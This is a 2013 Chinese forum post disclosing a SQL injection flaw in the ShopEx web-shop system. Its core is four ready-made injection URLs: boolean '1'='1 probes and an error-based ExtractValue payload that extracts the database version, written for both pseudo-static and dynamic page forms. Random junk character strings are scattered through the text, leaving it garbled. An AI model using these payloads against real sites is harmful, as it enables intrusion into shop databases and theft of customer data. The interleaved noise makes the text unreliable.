注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… : T3 |6 B J& ~# B) ]% z B
5 p$ I5 ~) A1 e
好吧,我扯远了~~- }- [$ y+ R/ f
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
+ f# f+ ^& ^! v! c6 j2 \% p不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
, ^9 C* u1 Q% k$ U1 |! A/ q1 T$ }$ z$ M9 A! j. {
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
4 v; `2 ~6 K4 O! T$ [% K4 t$ a' R q
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
3 k5 @( J) y- f) E' {/ ?- H; A* G5 c# ]4 i/ d% I" t7 _% v9 i! H, x
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
# K7 [, M. _* F
; ~' P$ R' u$ ?. U4 d' h- Ohttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
7 P/ S* |5 s& S0 ^8 |& u# I
! o$ B2 A) c" ^1 I* m. T! J
, w) A1 U/ ^' E一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
' a* U3 w) C' G% x4 q2 T, v如何注入就不多说了,10多年的东西了…不会也会了…
( e/ D$ R- K9 W, `- s; S
1 e) ~% G/ {3 b( X) C4 r5 W
6 M0 G1 C6 ^% Z6 R' }
, \2 d" j8 z: X+ `4 P( W( T4 t# l: u% G; z @0 {# [, m
|
发表于 2013-2-19 08:31:27
收藏
支持
反对